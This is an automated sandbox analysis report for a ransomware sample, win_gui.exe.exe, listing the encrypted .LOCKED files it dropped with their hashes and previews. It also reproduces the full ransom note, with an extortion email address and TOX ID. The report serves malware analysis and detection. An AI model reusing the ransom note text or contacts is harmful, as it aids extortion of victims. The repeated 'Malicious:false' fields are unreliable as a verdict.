                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.879902592427107
                                Encrypted:false
                                SSDEEP:48:4HzC8umzvyUbECRhL79A/WyYu+MAVMJg6Tcr+:s1zKUbEg7ievuAVOU+
                                MD5:A767EA34DBFD9C02D6FA899093D3C984
                                SHA1:EA1BBAF4CC7E2AB1400CDB8B879E1198ACC03DE9
                                SHA-256:E5758F56653795E789B06A4D80EAAD8343F511BEAC310FA62B9B439995195AA1
                                SHA-512:A0F77B0F269B56B0D5C405485BAC4CFF8F0A6627FA0F063C7DAAE07FCA350D2C6F62687A11555C7AB7B8C095D80C14A39C58A86ADD08FA9715B96FC1A0ED543C
                                Malicious:false
                                Preview:s.U.q.a....J..&.g.I..>w.A...lu.@.'I...L..~K.n+...g4.._ .o8..R...s.F...C...aD.kl.~.82.z..$_(>o..1.s..H.@.....N.f...hv.7O..F.3.G.X.-.....4.+M.`OWE..9V]...Cm.G..H...Dj.`..?I.E....K..O...e..H...?..S+Y]..~leg...IL.i.....z....^.....h....u|....<%3.suA....j.G...(.r..x;..J...f7........w.....Tl..X.W..w.^..q..N.\W.j...tE.MX..h.D{{E.vTf...W..r...S.....?;..3......31*..T....J@.<OY.....4...\Pg.........j....U...|[...n2..qbo._..a.s~.,;A.i ...&..,O...}..w.4..m0cV......a...4.D........l..L@..`.jg.K...a{...q..t.|-El4..BT.4f_4]....yf.i..?.....wwb..VCiH.y....8.J....S.TG$.......2.1ut\hs...f...~3f.Oh....3.a+.M.l..U...[..@l.......A.;/)P]IE..2.O..gF.~6d..:.r........?.n.SI....X...QU......:j...w..LJ.j...M/.c=;S.*..K3.....~.].}.Z....#S.....}.....k+...:...l.mi%~..."...Sc+.)R.}.b..;\.k......Z.8_.2.~...k..N..../&....6...!.F1G`@%d.$.."Y.>.q...|....|.C..(=.L..K.8Mg.dP.e.De!.&..X*..//?...\A!.K..M...6.HZ..:.|.!......t).'.^..|.M_rYy.I...g.@.j".......Xu......Q...I[/d.`1..

                                C:\Users\user\Desktop\NVWZAPQSQL.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.879902592427107
                                Encrypted:false
                                SSDEEP:48:4HzC8umzvyUbECRhL79A/WyYu+MAVMJg6Tcr+:s1zKUbEg7ievuAVOU+
                                MD5:A767EA34DBFD9C02D6FA899093D3C984
                                SHA1:EA1BBAF4CC7E2AB1400CDB8B879E1198ACC03DE9
                                SHA-256:E5758F56653795E789B06A4D80EAAD8343F511BEAC310FA62B9B439995195AA1
                                SHA-512:A0F77B0F269B56B0D5C405485BAC4CFF8F0A6627FA0F063C7DAAE07FCA350D2C6F62687A11555C7AB7B8C095D80C14A39C58A86ADD08FA9715B96FC1A0ED543C
                                Malicious:false
                                Preview:s.U.q.a....J..&.g.I..>w.A...lu.@.'I...L..~K.n+...g4.._ .o8..R...s.F...C...aD.kl.~.82.z..$_(>o..1.s..H.@.....N.f...hv.7O..F.3.G.X.-.....4.+M.`OWE..9V]...Cm.G..H...Dj.`..?I.E....K..O...e..H...?..S+Y]..~leg...IL.i.....z....^.....h....u|....<%3.suA....j.G...(.r..x;..J...f7........w.....Tl..X.W..w.^..q..N.\W.j...tE.MX..h.D{{E.vTf...W..r...S.....?;..3......31*..T....J@.<OY.....4...\Pg.........j....U...|[...n2..qbo._..a.s~.,;A.i ...&..,O...}..w.4..m0cV......a...4.D........l..L@..`.jg.K...a{...q..t.|-El4..BT.4f_4]....yf.i..?.....wwb..VCiH.y....8.J....S.TG$.......2.1ut\hs...f...~3f.Oh....3.a+.M.l..U...[..@l.......A.;/)P]IE..2.O..gF.~6d..:.r........?.n.SI....X...QU......:j...w..LJ.j...M/.c=;S.*..K3.....~.].}.Z....#S.....}.....k+...:...l.mi%~..."...Sc+.)R.}.b..;\.k......Z.8_.2.~...k..N..../&....6...!.F1G`@%d.$.."Y.>.q...|....|.C..(=.L..K.8Mg.dP.e.De!.&..X*..//?...\A!.K..M...6.HZ..:.|.!......t).'.^..|.M_rYy.I...g.@.j".......Xu......Q...I[/d.`1..

                                C:\Users\user\Desktop\NWCXBPIUYI.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874423051863231
                                Encrypted:false
                                SSDEEP:48:pKjfB3neBH841yWxkAZbn/WyYu+MAVMJg6T4:cfBXsc+lZDevuAVO4
                                MD5:3CB41EDC129EE610ADAC5BA869C023FD
                                SHA1:DDA1B96D18E8D14BB20DF829120FAF0DB0ECF5E1
                                SHA-256:F8FF5466386A40593E42E6DE48742854CF118594E5BA561CF64DCFAC2D86DE9C
                                SHA-512:B4891DEBAF7BC0128675A3A6CB6F35D3E5DE11A7CAF013996C08C6C9CFEE57AD52F86B991F4FB3037500A4F6C4BFBA942E017794DD10101A81A432B797367601
                                Malicious:false
                                Preview:+.q7.....T.P:.=...Z'.....#...L..B...P.d%,I.q.r,.j..f.........a...k.v...8...+p7|q..........w..)W..}.1D.].P...n..?vFq.90s...g.A@..........X,....1~.w..[L....v.o7.Vz......x#(...p.o...x..p..q..8........(...m..........:G.f.p.1..aJ=-...y....l>..=@T...2....@).z:..|z?.Hh...3.oG0...y.Z=..Y...?NQ.GNh0..".....F0F..O...7m.t.O.&..bj8......D...2r.$......k..._.=(../.dK(..@.u.?.....`.TT..d=..s...&?CRmr"..H....+7.........(..6(....-...`....?C..e..V.h..k..+"}.CkXLm!...3..h....0l...f..q?^.h.r.Qu.-..l...@.N...G....o.yd/..3....q...,.@Y..>.{.1),.....!*./.....dN...!.\.......X..2.KL...Ic..\.@...D..4kVU....>..._l.&..u....$y.....7E...$z..-.l.....f..O..g..6@.. .H./...}.3=...n..Ov....(..r....;.O...%......5.t.x.m~@.a.%zoeC.mE.(s..;u...|...,.>.......Z...1.W89.[H.H........^,..f..8..I.=.o.C.0.9.]...eG.m<.....A..$v.......4.l^...)'....5..C.y[h.=..=2[...C..+..'....kP..,...,....1(.j...l..S........!.'.?.......V.d.....g..$..>Ap....aG`...vs.......@2.........V..tn..

                                C:\Users\user\Desktop\NWCXBPIUYI.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.874423051863231
                                Encrypted:false
                                SSDEEP:48:pKjfB3neBH841yWxkAZbn/WyYu+MAVMJg6T4:cfBXsc+lZDevuAVO4
                                MD5:3CB41EDC129EE610ADAC5BA869C023FD
                                SHA1:DDA1B96D18E8D14BB20DF829120FAF0DB0ECF5E1
                                SHA-256:F8FF5466386A40593E42E6DE48742854CF118594E5BA561CF64DCFAC2D86DE9C
                                SHA-512:B4891DEBAF7BC0128675A3A6CB6F35D3E5DE11A7CAF013996C08C6C9CFEE57AD52F86B991F4FB3037500A4F6C4BFBA942E017794DD10101A81A432B797367601
                                Malicious:false
                                Preview:+.q7.....T.P:.=...Z'.....#...L..B...P.d%,I.q.r,.j..f.........a...k.v...8...+p7|q..........w..)W..}.1D.].P...n..?vFq.90s...g.A@..........X,....1~.w..[L....v.o7.Vz......x#(...p.o...x..p..q..8........(...m..........:G.f.p.1..aJ=-...y....l>..=@T...2....@).z:..|z?.Hh...3.oG0...y.Z=..Y...?NQ.GNh0..".....F0F..O...7m.t.O.&..bj8......D...2r.$......k..._.=(../.dK(..@.u.?.....`.TT..d=..s...&?CRmr"..H....+7.........(..6(....-...`....?C..e..V.h..k..+"}.CkXLm!...3..h....0l...f..q?^.h.r.Qu.-..l...@.N...G....o.yd/..3....q...,.@Y..>.{.1),.....!*./.....dN...!.\.......X..2.KL...Ic..\.@...D..4kVU....>..._l.&..u....$y.....7E...$z..-.l.....f..O..g..6@.. .H./...}.3=...n..Ov....(..r....;.O...%......5.t.x.m~@.a.%zoeC.mE.(s..;u...|...,.>.......Z...1.W89.[H.H........^,..f..8..I.=.o.C.0.9.]...eG.m<.....A..$v.......4.l^...)'....5..C.y[h.=..=2[...C..+..'....kP..,...,....1(.j...l..S........!.'.?.......V.d.....g..$..>Ap....aG`...vs.......@2.........V..tn..

                                C:\Users\user\Desktop\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Documents\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Users\user\Downloads\BJZFPPWAPT.docx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.854324211595779
                                Encrypted:false
                                SSDEEP:48:hQMoP4ul9Go8Xzei5Bg6nv/WyYu+MAVMJg6T2:hQ489UDnng6nvevuAVO2
                                MD5:2E582CA010BDD1B49FB74FCD3FBF8AAD
                                SHA1:45721303D6058CC13E52F4B2383B29CDFAF3ABAB
                                SHA-256:7B826E73BBCA9CFDDA97648C563B04D7EEF2848239A8265DCF33331E008DE0E9
                                SHA-512:7466E04DB1AF823336AF37BDD71B035B38EB6C78AAA917AEA5F7BB90F4738B8490E33AA693EC9EA604236C3ADFBB9881378EF82EE4D1F3B55DB6FF08F6526B62
                                Malicious:false
                                Preview:....Ju.r..I.^.y..h..S.......{..w.o.<._./$.V..7hPC...+_.5...-9.....3`m..~1......F..~.I..d..?....H../3...3.hZ.j.. 2..xi...+w..|.(x.P...u....#...e./..{.HJ.....-&6..h...v....tu.^iX..'/8...l./..:.K0.Gj.G0*m.:...)u...S+.7..ym.r..^.$Pg.mZ.u....9....,.-5.(]..L.{...K.]...)......+".i..[C.6.9O..$.......UL..f0.w{...{$$.x.>e$................;.j....b./.[...0.N.C.^...:..`WM..po.s.....^<jzn+.F..0..i........s."@..'.0....."...Fg..J,......8.~..!..jy.z..x......d..3.....$... ........+.0..4lo0....'.."..9-.E};,.8&..v.^_G>;vg.~+.X..!...x..L..4.._...x...`L...:.qr..J....[.?s.!.....{A...........o.^.FD.x.j...F...ok..+....#.=......p..+.@..|s..........]..Y...%`z.....WL.y.9..%... ..3....#..B{.'o..f......e.....@k.t....<8..._.....f...(:;.\Y`.......xZ.`:...5../..i...X..~r..........H..R....#..-....&.~.w.......Bpw.'.._3P...e.>Pq.0..$..c...>.%...!....$..}....:4p4.x....uA..}.. v..$.+wF...'?./ :.O..Z.S)....9>h..}...j...=.<....AC.g....-.~]}k.2i.{.z.<Q.+6>.*p..*..".)...0..=T........../].{

                                C:\Users\user\Downloads\BJZFPPWAPT.docx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.854324211595779
                                Encrypted:false
                                SSDEEP:48:hQMoP4ul9Go8Xzei5Bg6nv/WyYu+MAVMJg6T2:hQ489UDnng6nvevuAVO2
                                MD5:2E582CA010BDD1B49FB74FCD3FBF8AAD
                                SHA1:45721303D6058CC13E52F4B2383B29CDFAF3ABAB
                                SHA-256:7B826E73BBCA9CFDDA97648C563B04D7EEF2848239A8265DCF33331E008DE0E9
                                SHA-512:7466E04DB1AF823336AF37BDD71B035B38EB6C78AAA917AEA5F7BB90F4738B8490E33AA693EC9EA604236C3ADFBB9881378EF82EE4D1F3B55DB6FF08F6526B62
                                Malicious:false
                                Preview:....Ju.r..I.^.y..h..S.......{..w.o.<._./$.V..7hPC...+_.5...-9.....3`m..~1......F..~.I..d..?....H../3...3.hZ.j.. 2..xi...+w..|.(x.P...u....#...e./..{.HJ.....-&6..h...v....tu.^iX..'/8...l./..:.K0.Gj.G0*m.:...)u...S+.7..ym.r..^.$Pg.mZ.u....9....,.-5.(]..L.{...K.]...)......+".i..[C.6.9O..$.......UL..f0.w{...{$$.x.>e$................;.j....b./.[...0.N.C.^...:..`WM..po.s.....^<jzn+.F..0..i........s."@..'.0....."...Fg..J,......8.~..!..jy.z..x......d..3.....$... ........+.0..4lo0....'.."..9-.E};,.8&..v.^_G>;vg.~+.X..!...x..L..4.._...x...`L...:.qr..J....[.?s.!.....{A...........o.^.FD.x.j...F...ok..+....#.=......p..+.@..|s..........]..Y...%`z.....WL.y.9..%... ..3....#..B{.'o..f......e.....@k.t....<8..._.....f...(:;.\Y`.......xZ.`:...5../..i...X..~r..........H..R....#..-....&.~.w.......Bpw.'.._3P...e.>Pq.0..$..c...>.%...!....$..}....:4p4.x....uA..}.. v..$.+wF...'?./ :.O..Z.S)....9>h..}...j...=.<....AC.g....-.~]}k.2i.{.z.<Q.+6>.*p..*..".)...0..=T........../].{

                                C:\Users\user\Downloads\BJZFPPWAPT.jpg

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.875741186330271
                                Encrypted:false
                                SSDEEP:48:pRvaZma7A4YUMYlhuK/WyYu+MAVMJg6Tsa:zer7A4Y6CKevuAVOsa
                                MD5:A33F6E9450A2C58E1ECB12CA7E8F760F
                                SHA1:4D269E09B94881817753D266CCA9D315A526CF70
                                SHA-256:3F60798A66A280043609E6593589DD06290F81F1DC74D689E277F916ABC29AFC
                                SHA-512:5A85A4ACD02BD888F37B3A1BFF74778C660C99E03E0E8FCEF0B5DC93259F7ED5C836BB3D771C88AAB06DECCCF883746DD5476EFAE5515BEF098BAFC72D3822C3
                                Malicious:false
                                Preview:...D......>Zy.....vb...M....U.......j....i.b.1.ttY.....x.+$k.{.'.E.=TQW..+)&.I!.....+`u_..3$~...o^c.j...9......."L...OZE....XM...PDd.I3LOy.v..U..(.,BnV....Q)...`....i..M..,.`QrNBS...r..#^'..7A>S.....tV.d....'..]r.V....................7./... .........=.|i.z...22[zGY{....&....A......D.....H;....`.#..@..6(..(e..|...U....G..=..<..S.TYx.|A.....Qgx...?......eFD.$2h....Fp.....\.V.b....>/..zL.Z.4'CKd.8.7..1.*@....{A.F...\.af{{..7.4.6.^VE....3..F......ZrVf<....|..V....$..*....(.pe\.......#..S..&._)|Uv.!.@T.s.1..kL6.J......N..b0..j).J/..2.R..y..^0.-.%GK..e.....\#b.go+...C.)|_N......v..Q.#.3(.pq"`.$c...Uk&..{C4.~$.i...6...Y...q..t .....|.].w.]:.....u,0X.....L.....I.^..$F..-.3{..".G.=.......eC..!j...m.*b....bd,..R..,Y..6.GHhca\.l..yq...n.'.....Y..Y.H<....q...f...tv<.vp...59...c._;....,.o.v...v.%.Yr.k..vW......"g.. ..!.(....A.z..vG..E..[1......b.M.%2~."..i...{..35j?..9....J'.f..c.......7...a.2..s.lh}.6..P9C.....'..1..2".z......=.....O..q}......e

                                C:\Users\user\Downloads\BJZFPPWAPT.jpg.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.875741186330271
                                Encrypted:false
                                SSDEEP:48:pRvaZma7A4YUMYlhuK/WyYu+MAVMJg6Tsa:zer7A4Y6CKevuAVOsa
                                MD5:A33F6E9450A2C58E1ECB12CA7E8F760F
                                SHA1:4D269E09B94881817753D266CCA9D315A526CF70
                                SHA-256:3F60798A66A280043609E6593589DD06290F81F1DC74D689E277F916ABC29AFC
                                SHA-512:5A85A4ACD02BD888F37B3A1BFF74778C660C99E03E0E8FCEF0B5DC93259F7ED5C836BB3D771C88AAB06DECCCF883746DD5476EFAE5515BEF098BAFC72D3822C3
                                Malicious:false
                                Preview:...D......>Zy.....vb...M....U.......j....i.b.1.ttY.....x.+$k.{.'.E.=TQW..+)&.I!.....+`u_..3$~...o^c.j...9......."L...OZE....XM...PDd.I3LOy.v..U..(.,BnV....Q)...`....i..M..,.`QrNBS...r..#^'..7A>S.....tV.d....'..]r.V....................7./... .........=.|i.z...22[zGY{....&....A......D.....H;....`.#..@..6(..(e..|...U....G..=..<..S.TYx.|A.....Qgx...?......eFD.$2h....Fp.....\.V.b....>/..zL.Z.4'CKd.8.7..1.*@....{A.F...\.af{{..7.4.6.^VE....3..F......ZrVf<....|..V....$..*....(.pe\.......#..S..&._)|Uv.!.@T.s.1..kL6.J......N..b0..j).J/..2.R..y..^0.-.%GK..e.....\#b.go+...C.)|_N......v..Q.#.3(.pq"`.$c...Uk&..{C4.~$.i...6...Y...q..t .....|.].w.]:.....u,0X.....L.....I.^..$F..-.3{..".G.=.......eC..!j...m.*b....bd,..R..,Y..6.GHhca\.l..yq...n.'.....Y..Y.H<....q...f...tv<.vp...59...c._;....,.o.v...v.%.Yr.k..vW......"g.. ..!.(....A.z..vG..E..[1......b.M.%2~."..i...{..35j?..9....J'.f..c.......7...a.2..s.lh}.6..P9C.....'..1..2".z......=.....O..q}......e

                                C:\Users\user\Downloads\BJZFPPWAPT.xlsx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.873293781737056
                                Encrypted:false
                                SSDEEP:48:kZiCblxPa0Je469+lEQbxq/WyYu+MAVMJg6Tuv:QZxOTe8evuAVOu
                                MD5:0825944828C20B8691A09B1EF4B667C7
                                SHA1:C77EBF9913D7853199403C532FE6BB9959905E5C
                                SHA-256:6C3B204A3A7AA35DFDA36F513A78813AA1D74C223409E8B6CBA37EA336E62B5D
                                SHA-512:D9347885CA43293142F2327282811012CCCAFC42267554EFE44693A8EC7E6EDEF89330C5E1A74ED18DB439B1E7B39D77AC0199E5284F7C5FA06A42B507DEC937
                                Malicious:false
                                Preview:Q.s..`..g"...(.....O.<...&..%.25 .Xo^.....&...p...8..5..Pc B..k].VJ?.>BoT...%4M...W......Xx..-.......g..a...4r.....^.$/.`z.9..._..A...p...nU....I.....<.a..N..Jj?....o.n...'lL....h.m.(.x..-4S...u{.....M^.b.t.P...4[w.a......oj}..[>.X.f....*R.+..;...R.!+....:..*..E.{.6U@.......5.|*..5...Sa.....<...,.F.....Tg.2..3%..B...!P..``C.0......B.L1....Z..(O.......E.=.Rec.W...89...A.L.<.g.M..1Lrx...@k....e...$.A...%8( ..b...;..F.."V.....qc.2.n.V...h..N..S.....-p..pJ.9.V../. ...S....yR.O....^..8o.K..f.lvo.jQ.3+Z.Y.....~...#.(>..2s&...@,.q.z..G..\.....LhLc....Q+...8...4-...1..3oV)....=...L.TXE.....b.3f....W...)..;g...=-......=3...l....L...&jKI..$.6j~E.%v.......qv.a8.....(>.t.r....B.]..}.....0(N..DDtR.%3.S......0,.....Z..d.!iDq.O>..ck..E.a.@c..2..\n..|j))2fY=..#.i.m!.(.....$O.....71..7n=...ke.#G..|.6.+.).......#q.z........Znj{...)!..._...}o.ZD,g2...]....$.\W.+L=..9..P./...U...r%.K.?.i&lV.KH..#>.6......d...R.$:7x..=.....+K..._/c..dT./>.a8.....S]s....w...2.H..

                                C:\Users\user\Downloads\BJZFPPWAPT.xlsx.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.873293781737056
                                Encrypted:false
                                SSDEEP:48:kZiCblxPa0Je469+lEQbxq/WyYu+MAVMJg6Tuv:QZxOTe8evuAVOu
                                MD5:0825944828C20B8691A09B1EF4B667C7
                                SHA1:C77EBF9913D7853199403C532FE6BB9959905E5C
                                SHA-256:6C3B204A3A7AA35DFDA36F513A78813AA1D74C223409E8B6CBA37EA336E62B5D
                                SHA-512:D9347885CA43293142F2327282811012CCCAFC42267554EFE44693A8EC7E6EDEF89330C5E1A74ED18DB439B1E7B39D77AC0199E5284F7C5FA06A42B507DEC937
                                Malicious:false
                                Preview:Q.s..`..g"...(.....O.<...&..%.25 .Xo^.....&...p...8..5..Pc B..k].VJ?.>BoT...%4M...W......Xx..-.......g..a...4r.....^.$/.`z.9..._..A...p...nU....I.....<.a..N..Jj?....o.n...'lL....h.m.(.x..-4S...u{.....M^.b.t.P...4[w.a......oj}..[>.X.f....*R.+..;...R.!+....:..*..E.{.6U@.......5.|*..5...Sa.....<...,.F.....Tg.2..3%..B...!P..``C.0......B.L1....Z..(O.......E.=.Rec.W...89...A.L.<.g.M..1Lrx...@k....e...$.A...%8( ..b...;..F.."V.....qc.2.n.V...h..N..S.....-p..pJ.9.V../. ...S....yR.O....^..8o.K..f.lvo.jQ.3+Z.Y.....~...#.(>..2s&...@,.q.z..G..\.....LhLc....Q+...8...4-...1..3oV)....=...L.TXE.....b.3f....W...)..;g...=-......=3...l....L...&jKI..$.6j~E.%v.......qv.a8.....(>.t.r....B.]..}.....0(N..DDtR.%3.S......0,.....Z..d.!iDq.O>..ck..E.a.@c..2..\n..|j))2fY=..#.i.m!.(.....$O.....71..7n=...ke.#G..|.6.+.).......#q.z........Znj{...)!..._...}o.ZD,g2...]....$.\W.+L=..9..P./...U...r%.K.?.i&lV.KH..#>.6......d...R.$:7x..=.....+K..._/c..dT./>.a8.....S]s....w...2.H..

                                C:\Users\user\Downloads\DUUDTUBZFW.mp3

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867380751966938
                                Encrypted:false
                                SSDEEP:48:SGW3Sd5D6YQN9kwkW9BcpKe7A9C/WyYu+MAVMJg6Tiw:SGW3cl6YK9kwkW92b8EevuAVOn
                                MD5:66B99FB454B1631516A0BD2947C94C18
                                SHA1:06B51BAB918C3E7902B425848B807EFB2FA1044D
                                SHA-256:D620D4C115458D37B4AC100DCA22C3C808698A3576CC098616F09DBDFAC5CCED
                                SHA-512:8A011FCCE462A1B1521ABD179A8629DC22EF6BA1D2891F43626A456B45B9A70F47DEA1870131B67085BA007F89842F78364949C86A11CB80FE1DABA2F42D5A3B
                                Malicious:false
                                Preview:.....n.....U..;......O....!....D2.....-.S..Nk.s.3 3T=.......2....X@. ..E..%d}i..qX2.`.n.....#.*5.-%Z.#t...U.....W...(>..G...`=.al..Q.[>.].-Nf..M..w.mW.xs.pn...=.><.....D..*-~0.Y..s....co......@..m...... FA.P...n.V9l....e|.^4f....A.....h;r.JA........[Q...O`..O...B........2=....jiM^.2..#..b...z.P.K.9..Kd..1.^..jCNd.{..G)yF.w.R\k...~..g.h|F6t........a~uN%.&=p....b...'*<Ds_\....R..B.yj4...7...U.@.-.4..Q.f.S..W...oz..+..qc.H.=.j.&8`T.....}hI.....3......w......Y.......-S4Z/...-.Q<.Pw..C.7{%.f1..cL..]qg.j_.J...<....Y[.bxi....M..!aF...o.z..}...y..^................|.0.R.MW.."..>9..MR..N.k..M.lrI.]..n...i...8....;....l6..%.....M..f..w3....#.*..-.j..X.i...y..)..T.o....Y..EU,.c/....GBf6......#..6..0k......7..^.K0...>4.1R.~*.<z...S.4.$......6.t}....PcX..Ja...Hw..uqWS...Us.2...>.G.k.k..Puw...`l.`.j..p.......q...jj.|Z.....r.\..U...@P.&3.&..4.(...l...?..CngQ..R..2.W......&..c..L..M........^~1.n.....{....M..X.S.B..k.A..EgGv .Y.....a?.d...-.....j....?....Y

                                C:\Users\user\Downloads\DUUDTUBZFW.mp3.{391467B9-BD4E-2B74-71A6-03A3DA3DE322}.LOCKED (copy)

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.867380751966938
                                Encrypted:false
                                SSDEEP:48:SGW3Sd5D6YQN9kwkW9BcpKe7A9C/WyYu+MAVMJg6Tiw:SGW3cl6YK9kwkW92b8EevuAVOn
                                MD5:66B99FB454B1631516A0BD2947C94C18
                                SHA1:06B51BAB918C3E7902B425848B807EFB2FA1044D
                                SHA-256:D620D4C115458D37B4AC100DCA22C3C808698A3576CC098616F09DBDFAC5CCED
                                SHA-512:8A011FCCE462A1B1521ABD179A8629DC22EF6BA1D2891F43626A456B45B9A70F47DEA1870131B67085BA007F89842F78364949C86A11CB80FE1DABA2F42D5A3B
                                Malicious:false
                                Preview:.....n.....U..;......O....!....D2.....-.S..Nk.s.3 3T=.......2....X@. ..E..%d}i..qX2.`.n.....#.*5.-%Z.#t...U.....W...(>..G...`=.al..Q.[>.].-Nf..M..w.mW.xs.pn...=.><.....D..*-~0.Y..s....co......@..m...... FA.P...n.V9l....e|.^4f....A.....h;r.JA........[Q...O`..O...B........2=....jiM^.2..#..b...z.P.K.9..Kd..1.^..jCNd.{..G)yF.w.R\k...~..g.h|F6t........a~uN%.&=p....b...'*<Ds_\....R..B.yj4...7...U.@.-.4..Q.f.S..W...oz..+..qc.H.=.j.&8`T.....}hI.....3......w......Y.......-S4Z/...-.Q<.Pw..C.7{%.f1..cL..]qg.j_.J...<....Y[.bxi....M..!aF...o.z..}...y..^................|.0.R.MW.."..>9..MR..N.k..M.lrI.]..n...i...8....;....l6..%.....M..f..w3....#.*..-.j..X.i...y..)..T.o....Y..EU,.c/....GBf6......#..6..0k......7..^.K0...>4.1R.~*.<z...S.4.$......6.t}....PcX..Ja...Hw..uqWS...Us.2...>.G.k.k..Puw...`l.`.j..p.......q...jj.|Z.....r.\..U...@P.&3.&..4.(...l...?..CngQ..R..2.W......&..c..L..M........^~1.n.....{....M..X.S.B..k.A..EgGv .Y.....a?.d...-.....j....?....Y

                                C:\Users\user\Downloads\DUUDTUBZFW.pdf

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1634
                                Entropy (8bit):7.872245743467843
                                Encrypted:false
                                SSDEEP:48:9qaXzvCJol+KBWjVEgi/WyYu+MAVMJg6TF:9/XblbWJEBevuAVOF
                                MD5:0D49BBDCE0CE90BF82F9112D03BAD1B3
                                SHA1:9809B268AC9B67B1A7F685212947F08E18B51BE0
                                SHA-256:BDD73A8A1A47D3DAED1AA419D6836FE90CDEB09BDC6CFA3265B87199709E5302
                                SHA-512:477CF9F07D9BD8621572CB8AAD4284413174429D67FBC7D239347AA2B8BD4D73ACCC588BB8C035700F64C1909605BCE2AC98447C5456CAAC6F7736DD7C7E5B31
                                Malicious:false
